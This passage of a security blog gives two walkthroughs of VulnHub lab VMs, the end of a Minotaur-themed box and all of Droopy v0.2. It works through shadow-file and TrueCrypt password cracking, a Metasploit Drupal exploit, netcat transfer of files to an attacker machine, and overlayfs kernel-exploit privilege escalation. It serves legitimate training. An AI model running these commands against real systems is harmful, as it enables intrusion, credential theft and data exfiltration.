<b>==========</b><br />
So now we are in, lets see what a quick poke around can get us.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shell-02_zpsy7tpepj8.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shell-02_zpsy7tpepj8.png" height="544" width="640" /></a></div>
Awesome! a list of users and a flag along with a shadow backup file..<br />
and apparently *<i>My milkshake brings all the boys to the yard</i>*..OK.. :D<br />
<br />
Let's get a crackin on the found users..<br />
I transfer the shadow file to the attacker with netcat ;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc-out_zpsz71omdml.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc-out_zpsz71omdml.png" height="184" width="640" /></a></div>
<br />
<br />
<br />
<br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc-in_zps5sg9sqpi.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc-in_zps5sg9sqpi.png" height="168" width="640" /></a><br />
<br />
I do a bit of stripping to make sure hashcat can understand the hash correctly and run an attack using the best64 ruleset on a smallish wordlist;<br />
<span style="color: lime;">cat shadow.bak | egrep 'minotaur|heffer|h0rnbag|root' | cut -d : -f 2 > hashes.txt</span><br />
<span style="color: lime;">hashcat -a 0 -m 1800 hashes.txt -r /usr/share/hashcat/rules/best64.rule lists/password.lst </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crack-02_zpsfbwcsbk1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crack-02_zpsfbwcsbk1.png" height="320" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
heffer turns up a password pretty quickly; <b>Password1</b><br />
minotaur follows not too long after; <b>obiwan6</b><br />
root and h0rnbag remain elusive..<br />
<br />
<i>I like hashcat & cudaHashcat but I have to give props to JohnTheRipper for the unix hashes, the above stripping and 'complicated' use/choosing of rulesets is not necessary with John and the cracking process could also be done with a simple;</i><br />
<span style="color: lime;">john hashes.txt</span><br />
<br />
Let's switch user and see what else can be found with heffer's creds!<br />
<span style="color: lime;">sudo -u heffer</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/heffer-01_zps7lwirsof.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/heffer-01_zps7lwirsof.png" height="536" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Alright! heffer's flag obtained: <i>Th3 fl@g 15: m0000 y0</i><br />
<br />
Now lets switch users to minotaur and poke around a bit;<br />
<span style="color: lime;">su minotaur</span><br />
--> enter retrieved password when promted<br />
check out home directory of user minotaur<br />
<span style="color: lime;">cd /home/minotaur</span><br />
<span style="color: lime;">ls -lah </span><br />
<span style="color: lime;">cat flag.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/minotaur-01_zpslf5h7jt6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/minotaur-01_zpslf5h7jt6.png" height="412" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Yep flag retrieved; <i>M355 W17H T3H 8ULL, G37 73H H0RN!</i><br />
<br />
Hmm.. a message taunting us whether we can find /root/flag.txt..<br />
The audacity! :D<br />
<br />
cat /root/flag.txt<br />
ah, no privs, well we kinda expected that..<br />
<br />
<br />
<b>r00t</b><br />
<b>===</b><br />
2 methods found for getting root ;<br />
<br />
<u>1. overlayfs exploit;</u><br />
https://www.kernel-exploits.com/<br />
I downloaded the ofs_32 file and transferred to the /tmp directory with netcat<br />
Then made the file executable with chmod and ran the exploit;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-03_zpsnh6rc0fz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-03_zpsnh6rc0fz.png" height="348" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
root baby !<br />
<br />
<u>2. administrative privileges </u><br />
So what privs do we actually have ?<br />
<br />
<span style="color: lime;">sudo -ll</span><br />
ahhh... I spy with my little eye.. something that rhymes with boot ;)<br />
<span style="color: lime;">sudo su</span><br />
Enter minotaur's password and we have the coveted hashtag instead of dollar sign.. yup.. we have root privs !<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_zpsfvvgkzta.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_zpsfvvgkzta.png" height="376" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
From here its an easy road to the final flag.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-01_zpsubas2lon.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-01_zpsubas2lon.png" height="376" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="color: lime;">cd /root</span><br />
<span style="color: lime;">cat flag.txt</span><br />
Final flag: <i>5urr0und3d bY @r$3h0l35</i><br />
<br />
<br />
Job Done !<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bender_zps7yf1npsd.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bender_zps7yf1npsd.gif" height="320" width="229" /></a></div>
<br />
<br />
<br />
It is mentioned that the users for which passwords were found were able to run<br />
/root/bullquote.sh as root.<br />
When root I had a look for the file without success, perhaps it's one of the mentioned red herrings as that would possibly have been an other way in.<br />
<br />
<br />
Until I finally get the h0rnbag's password I wont consider this VM totally busted..<br />
considering the frequent use of leetspeek here, its possible the password has some of that as the O is replaced with a 0 in h0rnbag as well..<br />
<br />
If/When I crack it I will post it up ;)<br />
<br />
<br />
<br />
Thanks to Robert Winkel for the creation and to VulnHub for hosting these awesome VMs :D</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8356530514965708840.post-58542007030093104472016-04-23T19:00:00.003+02:002016-05-05T10:37:25.128+02:00VulnHub -- Droopy v0.2 -- Walkthrough<div dir="ltr" style="text-align: left;" trbidi="on">
The guys and gals at THS have been having a blast going through the VMs at vulnhub and the Droopy v0.2 proved no different.<br />
The lack of walkthroughs took away the ever-present temptation to go the easy way and made for a fun 'few' hours ;)<br />
<a href="https://www.vulnhub.com/entry/droopy-v02,143/" target="_blank">https://www.vulnhub.com/entry/droopy-v02,143/</a><br />
<div style="background-color: #f7f7f7; color: #606c75; font-family: open_sansregular; font-size: 14px; line-height: 20px; margin-bottom: 10px;">
There's 2 hints I would offer you:</div>
<div style="background-color: #f7f7f7; color: #606c75; font-family: open_sansregular; font-size: 14px; line-height: 20px; margin-bottom: 10px;">
1.) Grab a copy of the rockyou wordlist.</div>
<div style="background-color: #f7f7f7; color: #606c75; font-family: open_sansregular; font-size: 14px; line-height: 20px; margin-bottom: 10px;">
2.) It's fun to read other people's email.</div>
So from the hints, there is obviously some cracking to do, great ! We all love a good crack.<br />
<br />
So after firing up the VM, checked for IP's with netdiscover.<br />
(well actually the screenshot is of a script which basically gets local IP and then runs netdiscover based on that IP.. yup I'm lazy..)<br />
<br />
<span style="color: lime;">netdiscover -i eth0 -p -r 192.168.56.0/24</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ranger1_zpsknfdll2r.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ranger1_zpsknfdll2r.png" height="374" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
With the target's IP now in hand we run an nmap on it (using zenmap here) ;<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zenmap_zpsqodj2bom.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zenmap_zpsqodj2bom.png" height="588" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We find that port 80 is open so head over there to see that it requires a login.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/webpage_zpsd3gbx7jt.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/webpage_zpsd3gbx7jt.png" height="592" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We further find that robots.txt has quite a few entries, some of which sound promising.<br />
So I check out the list from robots.txt, and then check which ones are accessible to us;<br />
<br />
<span style="color: lime;">curl -s 192.168.56.102/robots.txt | grep Disallow | sed 's/Disallow: //'</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/robots-txt_zpspdsidfrt.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/robots-txt_zpspdsidfrt.png" height="582" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Thought I would check which ones accessible to us and move from there, but actually ended up checking all of them anyway..to no avail.. pff.. lol<br />
<span style="color: lime;"><br /></span>
<span style="color: lime;">for i in $(curl -s 192.168.56.102/robots.txt | grep Disallow | sed 's/Disallow: //') ; \</span><br />
<span style="color: lime;">do RESULT=$(curl -s -I 192.168.56.102"$i" | grep "200 OK") ; echo -e "$i $RESULT\r" ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/curl-01_zps84luhfwe.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/curl-01_zps84luhfwe.png" height="270" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Seeing the loginpages with /?= I thought maybe an sql vulnerability which sqlmap may be able to help me with.. ran sqlmap on it, alas to no avail, booo :(<br />
<br />
After having gone through all that, I cant say I felt like I had found a great deal, however a few things stood out, drupal and the login pages.<br />
<div>
It will be interesting to read how others use things such as the scripts found in the scripts directory, but my foo was too weak to use anything there to my advantage.</div>
<br />
I tried running hydra on the drupal login thinking that this is possibly where the cracking comes in to play ! Negative, hydra did not play nice on the logins, even when finally overcoming the dreaded false positives, the progress always throttled/stopped.<br />
<br />
Found some drupal crackers online and gave them a whirl, alas, again to no avail, I was either trying incorrect usernames or the password(s) were simply not in the usual quick wordlists or versions incorrect.. you name it.. if any reader comes across any good ones, please leave a comment!<br />
<br />
But then during the searches for other cracking options, I read about a major drupal exploit..<br />
Firing up msfconsole gave me the skiddy wisdom I so desperately craved..<br />
<br />
<span style="color: lime;">service postgresql start</span><br />
<span style="color: lime;">msfconsole</span><br />
<span style="color: lime;">search drupal</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf-01_zpspcwx4wmu.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf-01_zpspcwx4wmu.png" height="372" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Lets check out what the 2014 drupageddon exploit/multi/http/drupal_drupageddon has to offer!<br />
<br />
<span style="color: lime;">use exploit/multi/http/drupal_drupageddon</span><br />
<span style="color: lime;">show options</span><br />
<span style="color: lime;">set RHOST 192.168.56.102</span><br />
<span style="color: lime;">exploit</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf-02_zps9yqmkke8.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf-02_zps9yqmkke8.png" height="468" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The stuff of dreams in this case.. I only needed to offer a host address to the metasploit overlord and I was presented with a meterpreter shell !<br />
awesome ! but no root.. so time to enumerate the bejeezus out of this thing..<br />
<br />
But first, one of the hints mentioned email, so I moseyed over to /var/mail/ to see what was happening over there and sure enough ;<br />
<span style="color: lime;">pwd</span><br />
<span style="color: lime;">ls /var/</span><br />
<span style="color: lime;">ls /var/mail/</span><br />
<span style="color: lime;">cat /var/mail/www-data</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/email_zps4qpoqi4d.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/email_zps4qpoqi4d.png" height="486" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<blockquote class="tr_bq">
<i> Subject: rockyou with a nice hat!<br />Message-ID:<br /> X-IMAP: 0080081351 0000002016<br />Status: NN<br />George,<br />I've updated the encrypted file... You didn't leave any<br />hints for me. The password isn't longer than 11 characters<br />and anyway, we know what academy we went to, don't you...?<br />I'm sure you'll figure it out it won't rockyou too much!<br />If you are still struggling, remember that song by The Jam<br />Later,<br />Dave</i></blockquote>
<i>NEWS!</i> an encrypted file lurks somewhere here.. what? where? why?!<br />
The hints to rockyou quite obvious here and also mention of probable passphrase size! Well that could help cpu/gpu-starved VM citizens such as myself..<br />
Anyway, wtf are we looking for ?!<br />
<br />
We need root access to fully investigate all directories.. and we still ain't got it..<br />
<br />
In come whispers from the THS crew.. <i>** <whisper>check for local exploits TAPE **</whisper></i><br />
Sounds like a solid plan, I should have done that before all the bruteforce attempts and checking cron scripts which may be able to run on root level or gawd knows what.. damn.. *kicks self*<br />
<br />
So I go back to the enumeration idea again and use an enumeration script, I used a nice one I found online ( <a href="https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh">https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh</a> ), but g0tm1lk has a fantastic <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" target="_blank">post on enumeration</a> which definitely should be in your favourites.<br />
<br />
<div>
In any case, I checked for a read/writable/executable directory, found 2 directories that fit the bill;<br />
<b>/tmp</b> & <b>/var/tmp/ </b> </div>
<div>
<br />
So uploaded the script to /tmp/ using the meterpreter upload function.<br />
then dropped to shell and executed it, saving output to file instead of stdout.</div>
<span style="color: lime;">upload /root/tools/linenum.sh enum.sh</span><br />
<br />
Drop to shell;<br />
<span style="color: lime;">shell</span><br />
<br />
Run the enumeration script;<br />
<span style="color: lime;">bash enum.sh > enum.txt</span><br />
<br />
Some errors are reported for missing files, but I give the script a few secs to run and see that enum.txt is created.<br />
Then get out of shell and download the created enum.txt with the meterpreter shell to the attacking VM for easy viewing.<br />
<span style="color: lime;"><br /></span>
<span style="color: lime;">download enum.txt /root/enum/</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/enum-01_zpsyqdkibhp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/enum-01_zpsyqdkibhp.png" height="458" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
In this particular case, netcat is installed on the victim, so we could of course also do the transfer in the shell using netcat if we wanted to ;<br />
<br />
Starting the listening session on the attacker;<br />
<span style="color: lime;">nc -l -v -p 1234 > enum.txt</span><br />
Sending from the victim;<br />
<span style="color: lime;">nc -w 3 192.168.56.101 1234 < enum.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/netcat-01_zpsfg3lo72g.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/netcat-01_zpsfg3lo72g.png" height="516" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Anyway, browsing through the information from the enumeration script, we get kernel & OS details.<br />
<br />
<span style="color: lime;">head -n 35 enum.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/enum-02_zpsd08lx03n.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/enum-02_zpsd08lx03n.png" height="374" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Kernel information:<br />
<i>Linux version 3.13.0-43-generic (buildd@tipua) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014</i><br />
<br />
Specific release information:<br />
<i>DISTRIB_ID=Ubuntu</i><br />
<i>DISTRIB_RELEASE=14.04</i><br />
<i>DISTRIB_CODENAME=trusty</i><br />
<i>DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"</i><br />
<br />
<br />
so.. searchsploit to the rescue for exploit info !<br />
<br />
<span style="color: lime;">searchsploit ubuntu 14.04</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/searchsploit_zpsuizqvavr.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/searchsploit_zpsuizqvavr.png" height="392" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I see a few options to check out !<br />
<br />
So I uploaded, compiled did what I thought was required... but dammit.. consistently got errors and failed miserably..<br />
For whatever reason (and I am the first to blame my lack of expertise in the matter..) the local exploits were just not working and gave mount errors..<br />
<br />
Reaching the end of my tether, the good 'ol gents at THS (thanks Grey-Matter & H4v0K) pointed me to a website with kernel exploits for possible sanity-saving solutions;<br />
<a href="https://www.kernel-exploits.com/">https://www.kernel-exploits.com/</a><br />
<br />
There I see the same (or similar) overlayfs exploit which I could not get to work using the exploit from exploitdb, so I grabbed 'ofs_64'.<br />
<br />
So lets upload ofs_64 to the victim using the meterpreter shell, then drop to shell;<br />
<span style="color: lime;">upload /root/tools/ofs_64 ofs_64</span><br />
<span style="color: lime;">shell</span><br />
<br />
Then make the file executable and let it rip on the victim;<br />
<span style="color: lime;">chmod +x ofs_64</span><br />
<span style="color: lime;">./ofs_64</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/exploit_zpsintbdojw.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/exploit_zpsintbdojw.png" height="612" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
A quick user check;<br />
<span style="color: lime;">whoami</span><br />
<br />
And oh what a joyous moment, root is achieved!<br />
<br />
So, now we have root, time to furiously dig around in the directories which were previously hidden to us..<br />
In doing so we find a file in the /root/ directory ; dave.tc<br />
Could this be a protected truecrypt container ?<br />
(<a href="http://www.brimorlabsblog.com/2014/01/identifying-truecrypt-volumes-for-fun.html">http://www.brimorlabsblog.com/2014/01/identifying-truecrypt-volumes-for-fun.html</a>)<br />
<br />
I started up a netcat listener on my attacker and transferred the file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-01_zpsymhuu4si.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-01_zpsymhuu4si.png" height="620" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now to see if this was the object that the hint on cracking was about !<br />
So, previously, we had seen that the email was hinting at rockyou wordlist, and furthermore<br />
hinting that the passphrase size would not be more than 11 characters...<br />
<br />
SO, to assist in the plight of us cash strapped, gpu lacking VM soulmates, lets whittle that list down.<br />
Considering that the email was hinting that the passphrase was no more than 11 characters, lets cut all words out that do not have 11 characters ;<br />
<br />
<span style="color: lime;">pw-inspector -i rockyou.txt -m 11 -M 11 -o rock-11.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pw-insp_zpsbut7vqrz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pw-insp_zpsbut7vqrz.png" height="280" width="640" /></a></div>
<br />
<br />
<br />
<br />
awesome, just cut off over 13million passphrases from the list, that'll do.<br />
Now, with a relatively small wordlist we could run a crack on the Kali VM using truecrack ;<br />
<br />
<span style="color: lime;">truecrack -t dave.tc -k sha512 -w rock-11.txt -b 2 -v</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/truecrack_zpsj3ky5upj.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/truecrack_zpsj3ky5upj.png" height="406" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
But..as much as I really like to try to do as much as I can within the Kali VM, for this crack I had to revert to Windows as I have a (lowpowahmobile) gtx card in the lappy and at least get some semi-decent cracking speeds with hashcat on that..<br />
(stop laughing H4v0K and ch3rn0byl, I am well aware that my petty mobile GPU compares with the GPUs filling your slots like a pygmy marmoset compares with a silverback mountain gorilla.. :D)<br />
<br />
<br />
So firing up hashcat in Windows I first tried the hash code 6211 which did not yield any results..<br />
Then tried hash code <b>6221</b><br />
<span style="color: lime;">cudahashcat64.exe -m 6221 -a 0 d:\dave.tc d:\wordlists\rock-11.txt</span><br />
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hashcat_02_zpshgskzvxz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hashcat_02_zpshgskzvxz.png" height="560" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So now we have a password to the truecrypt container!</div>
Now what.. truecrypt is like persona non grata nowadays right? Not gonna install that anywhere..<br />
<br />
Some googling tells me I don't need to! cryptsetup will allow us to glean all information out of an encrypted truecrypt volume without needing truecrypt at all. Awesomesauce..<br />
<br />
It did take a further bit of googling to find a guide that seemed foolproof enough for the likes of me, but eventually I did find one ;<br />
<a href="http://www.adercon.com/ac/node/114">http://www.adercon.com/ac/node/114</a><br />
Awesome stuff.<br />
<br />
So lets mount it up at location /media/DAVE;<br />
<span style="color: lime;">mkdir /media/DAVE</span><br />
<span style="color: lime;">losetup /dev/loop0 /root/dave.tc</span><br />
<span style="color: lime;">cryptsetup --type tcrypt open /dev/loop0 DAVETC</span><br />
<i>(enter recovered password when prompted)</i><br />
<span style="color: lime;">mount /dev/mapper/DAVETC /media/DAVE</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cryptsetup_zpsaxp7xj7p.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cryptsetup_zpsaxp7xj7p.png" height="262" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
WOOHOOO ! stuff...<br />
<br />
Hmm.. listing the files in the found directories shows some nice pictures of cash and piggies.. nothing too interesting..<br />
(let's pretend I didnt spend a significant amount of time checking for steganography, hidden hex etc before i thought of checking for hidden files/directories..lol)<br />
<br />
So let's do a recursive file listing for all files including hidden files/directories;<br />
<br />
<span style="color: lime;">ls -laR /media/DAVE/</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/lslar_zpsitmukvqo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/lslar_zpsitmukvqo.png" height="640" width="548" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
What do I see there... flag.txt :D<br />
<br />
<span style="color: lime;">cat /media/DAVE/.secret/.top/flag.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/flag_zpswhntmx9l.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/flag_zpswhntmx9l.png" height="328" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Job Done :D<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/giphy_zpsi30bgdiy.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/giphy_zpsi30bgdiy.gif" height="179" width="320" /></a></div>
<br />
<br />
<br />
<br />
